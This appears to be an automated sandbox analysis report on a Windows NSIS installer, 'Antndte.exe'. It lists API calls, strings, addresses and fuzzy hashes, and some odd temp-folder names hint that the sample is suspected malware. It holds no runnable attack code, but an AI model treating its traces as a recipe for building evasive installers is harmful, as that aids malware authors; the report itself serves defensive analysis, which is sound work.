                                                                                                                                • GetCommandLineW.KERNEL32(coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Antndte.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Antndte.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                                                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                                                                                • ExitProcess.KERNEL32 ref: 0040370A
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Antndte.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Antndte.exe,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037CD
                                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                                                                                • ExitProcess.KERNEL32 ref: 004038B0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$C:\Users\user\AppData\Local\Temp\Undige\trivant$C:\Users\user\Desktop$C:\Users\user\Desktop\Antndte.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$coleoptera Setup$~nsu
                                                                                                                                • API String ID: 2488574733-2497349700
                                                                                                                                • Opcode ID: 8740e45e5a2bf030c9a121b0df8fe67dd9143e4620b1d2398d4d9988819c1278
                                                                                                                                • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                                                                                • Opcode Fuzzy Hash: 8740e45e5a2bf030c9a121b0df8fe67dd9143e4620b1d2398d4d9988819c1278
                                                                                                                                • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (graph image not captured; first block 405425-405440)
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                                                                                • GetClientRect.USER32(?,?), ref: 004054CF
                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                                                                                  • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,?,00404077), ref: 0040425A
                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004055FA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040561E
                                                                                                                                • ShowWindow.USER32(000103D2,00000008), ref: 00405623
                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040566D
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                                                                                • CreatePopupMenu.USER32 ref: 004056B2
                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405747
                                                                                                                                • EmptyClipboard.USER32 ref: 0040574D
                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                                                                                • CloseClipboard.USER32 ref: 004057A8
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                • String ID: {
                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4227406936-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (entry block 405990-4059b6; nodes marked Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 004059B9
                                                                                                                                • lstrcatW.KERNEL32(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,\*.*), ref: 00405A01
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405A2A
                                                                                                                                • FindFirstFileW.KERNELBASE(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405A3A
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban$\*.*
                                                                                                                                • API String ID: 2035342205-3525009409
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 004065D0
                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 2295610775-3404278061
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(004085E8,?,?,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\Undige\trivant, xrefs: 004021BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant
                                                                                                                                • API String ID: 542301482-226500509
                                                                                                                                • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                                                                • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                                                                                • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                                                                • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                                                                • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                                                                                • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                                                                • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                                                                • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                                                                                • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                                                                • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                                                                                • ShowWindow.USER32(?), ref: 00403D97
                                                                                                                                • DestroyWindow.USER32 ref: 00403DAB
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403EB1
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F26
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040401A
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404030
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040404F
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                • Opcode ID: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                                                                • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                                                                                • Opcode Fuzzy Hash: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                                                                • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                                                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Undige), ref: 00403AF8
                                                                                                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 1975747703-799513095
                                                                                                                                • Opcode ID: fad5457d8f38b8c09c8a39ec35915e90d6e0e04314475c23c8e641fe097f6c3c
                                                                                                                                • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                                                                                • Opcode Fuzzy Hash: fad5457d8f38b8c09c8a39ec35915e90d6e0e04314475c23c8e641fe097f6c3c
                                                                                                                                • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Antndte.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Antndte.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 4283519449-2219871103
                                                                                                                                • Opcode ID: 26585f3882fdea94a938261bd68019460abcc7be0e9174194b748f0908e10cc7
                                                                                                                                • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                                                                                • Opcode Fuzzy Hash: 26585f3882fdea94a938261bd68019460abcc7be0e9174194b748f0908e10cc7
                                                                                                                                • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 004063F8
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040531D,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 00406434
                                                                                                                                • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 00406442
                                                                                                                                • CoTaskMemFree.OLE32(0041C000), ref: 0040644D
                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 004064CB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 717251189-1238663416
                                                                                                                                • Opcode ID: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                                                                • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                                                                                • Opcode Fuzzy Hash: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                                                                • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Undige\trivant,?,?,00000031), ref: 004017D5
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant$C:\Users\user\AppData\Local\Temp\nsm118D.tmp$C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll$Call
                                                                                                                                • API String ID: 1941528284-2182250748
                                                                                                                                • Opcode ID: 4d409e155a61ffd0ac71ab5cd1aa4f2a7c0b45529f7f932e188af2d6c0b8514a
                                                                                                                                • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
